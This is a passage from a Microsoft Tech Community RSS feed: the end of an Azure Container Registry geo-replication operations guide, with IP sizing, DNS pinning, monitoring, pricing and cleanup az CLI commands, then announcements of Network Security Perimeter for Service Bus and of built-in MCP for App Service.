&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Configuration&lt;/th&gt;&lt;th&gt;IPs consumed per VNet&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;Initial private endpoint (global endpoint + home region dedicated data endpoint)&lt;/td&gt;&lt;td&gt;2&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Each geo-replication region added&lt;/td&gt;&lt;td&gt;+1 (regional dedicated data endpoint)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Regional endpoints enabled&lt;/td&gt;&lt;td&gt;+1 per geo-replica&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 50.00%" /&gt;&lt;col style="width: 50.00%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;&lt;STRONG&gt;Example:&lt;/STRONG&gt; A registry with 3 geo-replicas and regional endpoints enabled consumes &lt;STRONG&gt;7 private IPs&lt;/STRONG&gt; per VNet: 1 (global) + 3 (data) + 3 (regional). Without regional endpoints, the same registry requires &lt;STRONG&gt;4 private IPs&lt;/STRONG&gt;: 1 (global) + 3 (data).&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Subnet sizing:&lt;/STRONG&gt; Use at minimum a &lt;CODE&gt;/27&lt;/CODE&gt; (32 addresses) subnet for PE subnets on geo-replicated registries, and &lt;CODE&gt;/24&lt;/CODE&gt; where possible. To check how many private IPs are already consumed on a subnet:&lt;/P&gt;
&lt;PRE class="language-bash" tabindex="0" contenteditable="false" data-lia-code-value="az network vnet subnet show \
  --name &amp;lt;subnet-name&amp;gt; \
  --vnet-name &amp;lt;vnet-name&amp;gt; \
  --resource-group &amp;lt;resource-group&amp;gt; \
  --query &amp;quot;{addressPrefix:addressPrefix, usedIPs:length(ipConfigurations || \`[]\`)}&amp;quot; \
  --output table
"&gt;&lt;CODE&gt;az network vnet subnet show \
  --name &amp;lt;subnet-name&amp;gt; \
  --vnet-name &amp;lt;vnet-name&amp;gt; \
  --resource-group &amp;lt;resource-group&amp;gt; \
  --query "{addressPrefix:addressPrefix, usedIPs:length(ipConfigurations || \`[]\`)}" \
  --output table
&lt;/CODE&gt;&lt;/PRE&gt;
&lt;P&gt;See the &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/container-registry-private-endpoints" target="_blank" rel="noopener"&gt;ACR private endpoints documentation&lt;/A&gt; for the full IP-allocation math and sizing guidance.&lt;/P&gt;
&lt;H3 id="q10-geo-replica-creation-stuck-for-private-endpoint-enabled-registries"&gt;Q10. Geo-replica creation stuck for private endpoint-enabled registries&lt;/H3&gt;
&lt;P&gt;When creating a geo-replica for a registry that has private endpoints configured, the replica provisioning can get stuck in a &lt;CODE&gt;Creating&lt;/CODE&gt; state if the identity performing the operation doesn't have sufficient permissions to create private endpoint networking resources.&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Solution:&lt;/STRONG&gt;&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Manually delete the geo-replica that got stuck in the provisioning state.&lt;/LI&gt;
&lt;LI&gt;Ensure the identity has the permission &lt;CODE&gt;Microsoft.Network/privateEndpoints/privateLinkServiceProxies/write&lt;/CODE&gt; before creating the geo-replica again.&lt;/LI&gt;
&lt;LI&gt;Also verify that every PE subnet connected to the registry has free IP capacity — if &lt;STRONG&gt;any&lt;/STRONG&gt; PE subnet across any connected VNet does not have enough free IPs, the replication provisioning fails and rolls back. The replica appears briefly in a &lt;CODE&gt;Creating&lt;/CODE&gt; state and then is removed. The resulting error does not identify which subnet or VNet is exhausted.&lt;/LI&gt;
&lt;/UL&gt;
&lt;H3 id="q11-metrics-logs-and-alerts-for-the-three-phases"&gt;Q11. Metrics, logs, and alerts for the three phases&lt;/H3&gt;
&lt;P&gt;We map each phase to the signals available in the Monitoring Guidance section below. The headline: Resource Health (in the Azure portal) and &lt;CODE&gt;az acr replication list&lt;/CODE&gt; give you the platform-side signals; Azure Monitor platform metrics are collected automatically, and resource logs require Diagnostic Settings to be enabled on the customer side.&lt;/P&gt;
&lt;H3 id="behavior-summary"&gt;Behavior summary&lt;/H3&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Scenario&lt;/th&gt;&lt;th&gt;Automatic?&lt;/th&gt;&lt;th&gt;Customer Action Required&lt;/th&gt;&lt;th&gt;Notes&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;Registry in a region degrades&lt;/td&gt;&lt;td&gt;Yes&lt;/td&gt;&lt;td&gt;None&lt;/td&gt;&lt;td&gt;Health-aware failover; per-registry; minutes-scale; global endpoint operations only&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Region recovers after a degradation event&lt;/td&gt;&lt;td&gt;Yes&lt;/td&gt;&lt;td&gt;None&lt;/td&gt;&lt;td&gt;No cooldown&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Pin AKS clusters to co-located replicas&lt;/td&gt;&lt;td&gt;No&lt;/td&gt;&lt;td&gt;Use regional endpoint URLs in deployment manifests (Step 2a)&lt;/td&gt;&lt;td&gt;Coexists with global endpoint&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;No pinning needed for most workloads&lt;/td&gt;&lt;td&gt;Yes&lt;/td&gt;&lt;td&gt;None — keep using &lt;CODE&gt;myregistry.azurecr.io&lt;/CODE&gt; (Step 2b)&lt;/td&gt;&lt;td&gt;Global endpoint plus health-aware failover&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Push/pull from the same replica (consistency)&lt;/td&gt;&lt;td&gt;No&lt;/td&gt;&lt;td&gt;Use a regional endpoint for both push and pull&lt;/td&gt;&lt;td&gt;Eliminates DNS bouncing and mid-push scatter&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Capacity planning per region&lt;/td&gt;&lt;td&gt;No&lt;/td&gt;&lt;td&gt;Spread workloads across multiple regional endpoints&lt;/td&gt;&lt;td&gt;Per-replica throttling; avoid concentrating on one replica&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;DR rehearsal: take a replica out of global routing&lt;/td&gt;&lt;td&gt;No&lt;/td&gt;&lt;td&gt;&lt;CODE&gt;az acr replication update --global-endpoint-routing false&lt;/CODE&gt;&lt;/td&gt;&lt;td&gt;Data continues syncing both directions; costs continue accruing&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Re-enable replica participation in global routing&lt;/td&gt;&lt;td&gt;No&lt;/td&gt;&lt;td&gt;&lt;CODE&gt;az acr replication update --global-endpoint-routing true&lt;/CODE&gt;&lt;/td&gt;&lt;td&gt;No cooldown; replica is immediately ready&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Switch a workload between endpoints&lt;/td&gt;&lt;td&gt;No&lt;/td&gt;&lt;td&gt;Re-auth (&lt;CODE&gt;az acr login&lt;/CODE&gt;, SDK auth, or Kubernetes ACR credential provider)&lt;/td&gt;&lt;td&gt;Each endpoint is its own authenticated surface&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Initial replica seeding on a live registry&lt;/td&gt;&lt;td&gt;N/A&lt;/td&gt;&lt;td&gt;None&lt;/td&gt;&lt;td&gt;Existing replica continues serving traffic; seeding time scales with &lt;STRONG&gt;registry size&lt;/STRONG&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Long-running push during a failover&lt;/td&gt;&lt;td&gt;No&lt;/td&gt;&lt;td&gt;Retry; design publishes to be idempotent&lt;/td&gt;&lt;td&gt;Pin via regional endpoint to avoid mid-push scatter; ACR is tightening this behavior&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Pull of a recently pushed image from a different region&lt;/td&gt;&lt;td&gt;No&lt;/td&gt;&lt;td&gt;Wait for replication, retry with backoff, or check replication status&lt;/td&gt;&lt;td&gt;Eventual consistency; bounded staleness consistency in development&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Home region outage&lt;/td&gt;&lt;td&gt;Data plane: yes; control plane: no&lt;/td&gt;&lt;td&gt;Use global or regional endpoints for data plane operations&lt;/td&gt;&lt;td&gt;Control plane (replica config, network rules) requires home region&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 25.00%" /&gt;&lt;col style="width: 25.00%" /&gt;&lt;col style="width: 25.00%" /&gt;&lt;col style="width: 25.00%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;H2 id="dns-and-client-side-considerations"&gt;DNS and Client-Side Considerations&lt;/H2&gt;
&lt;P&gt;DNS bouncing during a single push is the most common geo-replication push problem in customer threads, and it warrants a section of its own.&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;The failure mode.&lt;/STRONG&gt; A &lt;CODE&gt;docker push&lt;/CODE&gt; is a sequence of HTTP requests: blob uploads for each layer, then a manifest upload that references those layers by digest. If the Linux DNS resolver on the client doesn't cache &lt;CODE&gt;myregistry.azurecr.io&lt;/CODE&gt; consistently for the duration of the push, individual sub-requests can resolve to different replicas. Because replication is eventually consistent, the manifest can land on a replica that doesn't yet have the layers it references, and the manifest validation fails.&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;The two mitigations:&lt;/STRONG&gt;&lt;/P&gt;
&lt;OL&gt;
&lt;LI&gt;&lt;STRONG&gt;Regional endpoints&lt;/STRONG&gt; pin the push to a single replica end-to-end. Every sub-request — login, blob uploads, manifest upload — goes to the same replica. This is the cleanest fix and the one we recommend for any pipeline where push/pull consistency matters.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;A short-lived client-side DNS cache like &lt;CODE&gt;dnsmasq&lt;/CODE&gt;&lt;/STRONG&gt; scoped to the duration of a single push. For Linux VMs in Azure, follow the &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/virtual-machines/linux/azure-dns" target="_blank" rel="noopener"&gt;DNS name resolution options&lt;/A&gt; guidance. The pin should last the push and no longer. For other clients performing pushes, you can customize your stack's DNS resolver to have a similar short-lived DNS cache to pin the global endpoint's resolved DNS for only the duration of an image push operation.&lt;/LI&gt;
&lt;/OL&gt;
&lt;P&gt;&lt;STRONG&gt;A note on long-lived DNS caching for the global endpoint.&lt;/STRONG&gt; Don't run a long-lived DNS cache for &lt;CODE&gt;myregistry.azurecr.io&lt;/CODE&gt;. ACR purges its own DNS records on the server side when a replica is taken out of global routing (Step 3) and during health-aware failover; a long-lived client-side cache will keep clients pointed at the old region after our purge, which makes both the manual disable mechanism and health-aware failover look broken from the client's perspective.&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Retry behavior:&lt;/STRONG&gt;&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;In-flight pushes during a failover may fail. Design publish steps to be idempotent so retries are safe.&lt;/LI&gt;
&lt;LI&gt;Pipelines that push in one region and immediately pull from a different region should retry with backoff or check replication status — eventual consistency means the pull may race ahead of replication.&lt;/LI&gt;
&lt;LI&gt;ACR is working on bounded staleness consistency that addresses this directly by enabling proxying (on ACR infrastructure) an image pull request from one geo-replica (if it does not have the image) to another geo-replica that has the image; see the relevant FAQ item.&lt;/LI&gt;
&lt;/UL&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;&lt;STRONG&gt;Note:&lt;/STRONG&gt; Specific retry counts, back-off intervals, and push timeout values are application-layer decisions. The platform behavior is documented; the retry policy belongs to your client.&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;H2 id="monitoring-guidance"&gt;Monitoring Guidance&lt;/H2&gt;
&lt;P&gt;We map the three phases to the signals available from each source. Where a signal requires customer-side configuration, we flag it.&lt;/P&gt;
&lt;H3 id="phase-a-initial-replication-after-creating-a-new-replica-"&gt;Phase A: Initial replication (after creating a new replica)&lt;/H3&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;&lt;CODE&gt;az acr replication list&lt;/CODE&gt; and &lt;CODE&gt;az acr replication show&lt;/CODE&gt;&lt;/STRONG&gt; — confirm the new replica reaches &lt;CODE&gt;provisioningState: Succeeded&lt;/CODE&gt; and &lt;CODE&gt;status: online&lt;/CODE&gt;, and view per-replica status.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Azure Monitor platform metrics&lt;/STRONG&gt; — push count, pull count, and other registry metrics are collected automatically and visible in the Azure portal under Metrics. No customer configuration is needed to view platform metrics. To &lt;STRONG&gt;export&lt;/STRONG&gt; metrics or enable &lt;STRONG&gt;resource logs&lt;/STRONG&gt; (detailed operation logs), configure &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/monitor-service" target="_blank" rel="noopener"&gt;Diagnostic Settings&lt;/A&gt; on the registry.&lt;/LI&gt;
&lt;/UL&gt;
&lt;H3 id="phase-b-failover-planned-via-replica-disable-or-automatic-via-health-aware-failover-"&gt;Phase B: Failover (planned via replica disable, or automatic via health-aware failover)&lt;/H3&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;Per-replica &lt;CODE&gt;regionEndpointEnabled&lt;/CODE&gt; state&lt;/STRONG&gt; via &lt;CODE&gt;az acr replication list&lt;/CODE&gt; — confirms whether a manual disable took effect, i.e. which replicas are currently eligible for global endpoint routing. Note: this flag reflects the &lt;STRONG&gt;manual configuration&lt;/STRONG&gt; for configuring a geo-replica's global endpoint routing eligibility; it does not indicate whether health-aware failover has actively rerouted traffic away from a replica.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Resource Health&lt;/STRONG&gt; for the registry (in the Azure portal under &lt;STRONG&gt;Help &amp;gt; Resource health&lt;/STRONG&gt;) — surfaces platform-side degradation signals during incidents. ACR does not yet expose a definitive "this region is currently serving your traffic" signal; Resource Health and client-side latency changes are the best available indicators.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Pull latency from clients&lt;/STRONG&gt; — increased latency from a more distant replica is the client-observable signal that traffic has rerouted.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Azure Monitor platform metrics&lt;/STRONG&gt; — visible per-region in the Azure portal Metrics blade. To export metrics or query them programmatically, enable Diagnostic Settings.&lt;/LI&gt;
&lt;/UL&gt;
&lt;H3 id="phase-c-failback-replica-returns-to-global-routing-"&gt;Phase C: Failback (replica returns to global routing)&lt;/H3&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;&lt;CODE&gt;az acr replication list&lt;/CODE&gt;&lt;/STRONG&gt; — confirms &lt;CODE&gt;regionEndpointEnabled: True&lt;/CODE&gt; (manual) or &lt;CODE&gt;online&lt;/CODE&gt; status across all replicas (automatic).&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Pull latency normalizing&lt;/STRONG&gt; as clients reach the recovered replica again.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Resource Health&lt;/STRONG&gt; clearing for the registry (visible in the Azure portal).&lt;/LI&gt;
&lt;/UL&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;&lt;STRONG&gt;Note:&lt;/STRONG&gt; The health-aware failover blog calls out ongoing work to surface richer signals — including notifications for when routing changes and which region is currently serving your traffic. The signals listed above are what's available today.&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;H2 id="pricing-considerations"&gt;Pricing Considerations&lt;/H2&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;Storage billing vs. storage quota&lt;/STRONG&gt;: Storage is &lt;STRONG&gt;billed&lt;/STRONG&gt; per geo-replica — a 1 GiB image replicated to 5 geo-replicas is charged as 5 GiB of storage (1 GiB × 5 geo-replicas). However, storage &lt;STRONG&gt;quota&lt;/STRONG&gt; (the tier's maximum storage limit) counts the image only once — the same 1 GiB image counts as 1 GiB toward your tier's maximum, not 5 GiB.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Data transfer&lt;/STRONG&gt;: Geo-replication can reduce costs by enabling in-region image pushes and pulls, which avoids cross-region data transfer charges during these push or pull operations. However, cross-region data transfer charges still apply when ACR replicates pushed content to other geo-replicas as part of eventual consistency.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Disabled replicas still cost&lt;/STRONG&gt;: When you take a replica out of global routing with &lt;CODE&gt;--global-endpoint-routing false&lt;/CODE&gt;, storage and per-replica costs continue accruing because data continues syncing bidirectionally.&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;For more information, see &lt;A class="lia-external-url" href="https://azure.microsoft.com/pricing/details/container-registry/" target="_blank" rel="noopener"&gt;ACR pricing&lt;/A&gt;.&lt;/P&gt;
&lt;H2 id="cleanup"&gt;Cleanup&lt;/H2&gt;
&lt;P&gt;Run these commands to undo the walkthrough setup. Order matters: disable regional endpoints before deleting replicas, since regional endpoint URLs depend on which replicas exist.&lt;/P&gt;
&lt;PRE class="language-bash" tabindex="0" contenteditable="false" data-lia-code-value="# Disable regional endpoints if you enabled them in Step 2a
az acr update -n myregistry -g myrg --regional-endpoints disabled

# Re-enable any replicas you disabled in Step 3 (no-op if already enabled)
az acr replication update --registry myregistry --name westus \
  --global-endpoint-routing true

# Delete the West US replica created in Step 1
az acr replication delete --registry myregistry --name westus

# Confirm only the home region replica remains
az acr replication list --registry myregistry --output table
"&gt;&lt;CODE&gt;# Disable regional endpoints if you enabled them in Step 2a
az acr update -n myregistry -g myrg --regional-endpoints disabled

# Re-enable any replicas you disabled in Step 3 (no-op if already enabled)
az acr replication update --registry myregistry --name westus \
  --global-endpoint-routing true

# Delete the West US replica created in Step 1
az acr replication delete --registry myregistry --name westus

# Confirm only the home region replica remains
az acr replication list --registry myregistry --output table
&lt;/CODE&gt;&lt;/PRE&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;&lt;STRONG&gt;Note:&lt;/STRONG&gt; Replica deletion is a control-plane operation that requires the home region to be available. During a home region outage, replica configuration cannot be modified.&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;H2 id="summary-table"&gt;Summary Table&lt;/H2&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Question&lt;/th&gt;&lt;th&gt;Answer&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;When should I use regional endpoints vs the global endpoint?&lt;/td&gt;&lt;td&gt;Use regional endpoints (Step 2a) for workloads that need affinity, predictable routing, push/pull consistency, troubleshooting, or client-side failover. Use the global endpoint (Step 2b) for everything else and let health-aware failover handle routing.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;What should I enable for secure, resilient layer downloads?&lt;/td&gt;&lt;td&gt;Enable &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/container-registry-dedicated-data-endpoints" target="_blank" rel="noopener"&gt;dedicated data endpoints&lt;/A&gt;. They scope firewall rules tightly to your registry and replace wildcard storage DNS with predictable per-region FQDNs.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;How do I avoid DNS-bouncing manifest validation failures on push?&lt;/td&gt;&lt;td&gt;Pin pushes to a single replica via a regional endpoint. A short-lived client-side &lt;CODE&gt;dnsmasq&lt;/CODE&gt; for the push duration is also fine if you're not using regional endpoints.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Should I run a long-lived DNS cache for the global endpoint?&lt;/td&gt;&lt;td&gt;No. ACR purges DNS server-side on disable and during failover; client-side caching works against that.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Do I need to re-auth when switching endpoints?&lt;/td&gt;&lt;td&gt;Yes. Each global or regional endpoint is its own authenticated surface. &lt;CODE&gt;az acr login&lt;/CODE&gt;, SDK auth, or the Kubernetes ACR credential provider handles the re-auth.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;What happens during a home region outage?&lt;/td&gt;&lt;td&gt;Data plane keeps working through any replica via the global endpoint or regional endpoints. Control plane operations (replica configuration, network rules) are unavailable until the home region recovers. The home region is fixed at registry creation.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;What's ACR doing about eventual-consistency pain?&lt;/td&gt;&lt;td&gt;Bounded staleness consistency for cross-replica pushed images is in development and will be covered in an upcoming blog post. Reach out via GitHub if you want to share your scenario.&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 50.00%" /&gt;&lt;col style="width: 50.00%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;For the full automation matrix — what's automatic, what requires customer action, and what to expect for each scenario — see the behavior summary above.&lt;/P&gt;
&lt;P&gt;If you have further questions about ACR geo-replication routing, pinning, capacity planning, eventual consistency, or failover behavior, reach out to us on the &lt;A class="lia-external-url" href="https://github.com/Azure/acr" target="_blank" rel="noopener"&gt;Azure Container Registry GitHub repository&lt;/A&gt; or file feedback through the Azure portal.&lt;/P&gt;</description>
      <pubDate>Mon, 08 Jun 2026 18:07:21 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/apps-on-azure-blog/designing-for-high-availability-the-operational-reference-for/ba-p/4526465</guid>
      <dc:creator>johnsonshi_msft</dc:creator>
      <dc:date>2026-06-08T18:07:21Z</dc:date>
    </item>
    <item>
      <title>GA of NSP for Azure Service Bus &amp; NSP now available in Azure Gov. Regions</title>
      <link>https://techcommunity.microsoft.com/t5/azure-networking-blog/ga-of-nsp-for-azure-service-bus-nsp-now-available-in-azure-gov/ba-p/4526413</link>
      <description>&lt;H3&gt;TL; DR&lt;/H3&gt;
&lt;P&gt;Network Security Perimeter (NSP) support for Azure Service Bus is now &lt;STRONG&gt;Generally Available&lt;/STRONG&gt;. With this, you can now place your Service Bus namespace inside a central security boundary and apply perimeter-based governance for inbound/outbound network access—while keeping key PaaS-to-PaaS scenarios secure and auditable.&lt;/P&gt;
&lt;H1&gt;&lt;STRONG&gt;Introduction&lt;/STRONG&gt;&lt;/H1&gt;
&lt;P&gt;We’re excited to announce that &lt;STRONG&gt;Network Security Perimeter (NSP) support for Azure Service Bus is now Generally Available (GA)&lt;/STRONG&gt;.&lt;/P&gt;
&lt;P&gt;This milestone brings one of Azure’s most widely used messaging services into the NSP ecosystem, enabling customers to define a centralized security boundary across messaging and data services.&lt;/P&gt;
&lt;P&gt;Alongside this, we are also expanding NSP’s reach — NSP is now available in Azure Government regions, including:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Texas&lt;/LI&gt;
&lt;LI&gt;Arizona&lt;/LI&gt;
&lt;LI&gt;Virginia&lt;/LI&gt;
&lt;LI&gt;DoD East&lt;/LI&gt;
&lt;LI&gt;DoD Central&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;This ensures that customers operating in regulated, sovereign, and mission-critical environments can adopt NSP while meeting their compliance and regional requirements.&lt;/P&gt;
&lt;H1&gt;&lt;STRONG&gt;Why this matters?&lt;/STRONG&gt;&lt;/H1&gt;
&lt;P&gt;Modern applications rely heavily on messaging layers like Service Bus. These systems often connect microservices, data platforms, key management systems and external integrations. As architectures scale, managing network access individually becomes complex and error prone.&lt;/P&gt;
&lt;P&gt;NSP changes this by introducing a perimeter-based access model, where:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Communication is restricted by default&lt;/LI&gt;
&lt;LI&gt;Access must be explicitly allowed&lt;/LI&gt;
&lt;LI&gt;Governance is applied consistently across services&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;With Service Bus now onboarded and NSP extending into Azure Gov regions, customers can apply this model across both commercial and sovereign environments.&lt;/P&gt;
&lt;H1&gt;&lt;STRONG&gt;What you can do with Service Bus + NSP&lt;/STRONG&gt;&lt;/H1&gt;
&lt;H2&gt;Confine communication within a security boundary&lt;/H2&gt;
&lt;P&gt;Service Bus namespaces communicate only with resources inside the perimeter by default—blocking unintended access.&lt;/P&gt;
&lt;H2&gt;Secure PaaS-to-PaaS communication&lt;/H2&gt;
&lt;P&gt;Enable secure interactions between Service Bus, Azure Key Vault (for CMK scenarios) and other NSP-enabled services (&lt;A href="https://learn.microsoft.com/en-us/azure/private-link/network-security-perimeter-concepts#onboarded-private-link-resources" target="_blank"&gt;What is a network security perimeter? - Azure Private Link | Microsoft Learn&lt;/A&gt;)&lt;/P&gt;
&lt;H2&gt;Define explicit access controls&lt;/H2&gt;
&lt;UL&gt;
&lt;LI&gt;Inbound rules → IP ranges and subscriptions&lt;/LI&gt;
&lt;LI&gt;Outbound rules → FQDN-based filtering&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2&gt;Enable audit and compliance visibility&lt;/H2&gt;
&lt;P&gt;Diagnostic logs capture all access attempts, supporting compliance and investigation workflows.&lt;/P&gt;
&lt;H2&gt;Use Private Link seamlessly&lt;/H2&gt;
&lt;P&gt;Private endpoint traffic continues to work without additional configuration inside the perimeter.&lt;/P&gt;
&lt;H1&gt;&lt;STRONG&gt;Azure Government Availability&lt;/STRONG&gt;&lt;/H1&gt;
&lt;P&gt;With this update, NSP is now available in key &lt;STRONG&gt;Azure Government regions (Texas Arizona Virginia DoD East DoD Central)&lt;/STRONG&gt;, enabling:&lt;/P&gt;
&lt;H2&gt;Consistent security across clouds&lt;/H2&gt;
&lt;P&gt;Apply the same NSP model across public Azure regions and Azure Government environments.&lt;/P&gt;
&lt;H2&gt;Support for regulated workloads&lt;/H2&gt;
&lt;P&gt;Customers in federal, defence, and highly regulated industries can now:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Enforce perimeter-based governance&lt;/LI&gt;
&lt;LI&gt;Reduce exposure risks&lt;/LI&gt;
&lt;LI&gt;Meet compliance requirements&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2&gt;Enable secure cross-service patterns in Gov clouds&lt;/H2&gt;
&lt;P&gt;Azure Government boundaries now support scenarios like:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;CMK with Key Vault&lt;/LI&gt;
&lt;LI&gt;Service-to-service messaging&lt;/LI&gt;
&lt;LI&gt;Controlled external access&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;More details of onboarded PaaS services are detailed in &lt;A href="https://learn.microsoft.com/en-us/azure/private-link/network-security-perimeter-concepts#onboarded-private-link-resources" target="_blank"&gt;What is a network security perimeter? - Azure Private Link | Microsoft Learn&lt;/A&gt;&lt;/P&gt;
&lt;H1&gt;&lt;STRONG&gt;What’s next&lt;/STRONG&gt;&lt;/H1&gt;
&lt;P&gt;Service Bus GA further strengthens NSP’s growing coverage across Azure PaaS services. We will continue to:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Expand PaaS service onboarding&lt;/LI&gt;
&lt;LI&gt;Improve access rule capabilities (e.g. Service tag-based access, identity-based access)&lt;/LI&gt;
&lt;/UL&gt;</description>
      <pubDate>Mon, 08 Jun 2026 14:01:28 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/azure-networking-blog/ga-of-nsp-for-azure-service-bus-nsp-now-available-in-azure-gov/ba-p/4526413</guid>
      <dc:creator>shashankamalladi</dc:creator>
      <dc:date>2026-06-08T14:01:28Z</dc:date>
    </item>
    <item>
      <title>Now in preview: built-in MCP for Azure App Service</title>
      <link>https://techcommunity.microsoft.com/t5/apps-on-azure-blog/now-in-preview-built-in-mcp-for-azure-app-service/ba-p/4526407</link>
      <description>&lt;P&gt;At Build 2026 last week, we announced the public preview of &lt;STRONG&gt;built-in MCP for Azure App Service&lt;/STRONG&gt;. It does one thing, and it does it with almost no effort on your part: it turns a REST API you already host on App Service into a &lt;A class="lia-external-url" href="https://modelcontextprotocol.io/introduction" target="_blank"&gt;Model Context Protocol (MCP)&lt;/A&gt; server, so AI agents and assistants can call your API as a set of tools. No MCP code to write. No second service to deploy.&lt;/P&gt;
&lt;H3&gt;What it does&lt;/H3&gt;
&lt;P&gt;You give App Service an OpenAPI 3.x specification (JSON or YAML) describing the operations you want to expose. The platform reads that spec and generates one MCP tool per operation, then serves the MCP endpoint over streamable HTTP at a path you choose (the default is &lt;STRONG&gt;/mcp&lt;/STRONG&gt;). From there, App Service handles the parts that are tedious to build yourself:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;MCP protocol negotiation&lt;/LI&gt;
&lt;LI&gt;Tool discovery, so clients can list the operations your spec exposes&lt;/LI&gt;
&lt;LI&gt;Hot reload of the spec when it changes&lt;/LI&gt;
&lt;LI&gt;Client cancellation&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;Any MCP-compatible client can connect, including GitHub Copilot Chat, Cursor, Windsurf, and Claude Desktop.&lt;/P&gt;
&lt;H3&gt;Why it matters&lt;/H3&gt;
&lt;P&gt;Most teams already have the API the agent ecosystem wants to call. What they don't have is the time to wrap it in a bespoke MCP server, keep that server in sync with the API, and operate it. Built-in MCP removes that work entirely. If your REST API runs on App Service and you can produce an OpenAPI spec for it — and most web frameworks generate one for you — you're a configuration change away from an agent-ready endpoint.&lt;/P&gt;
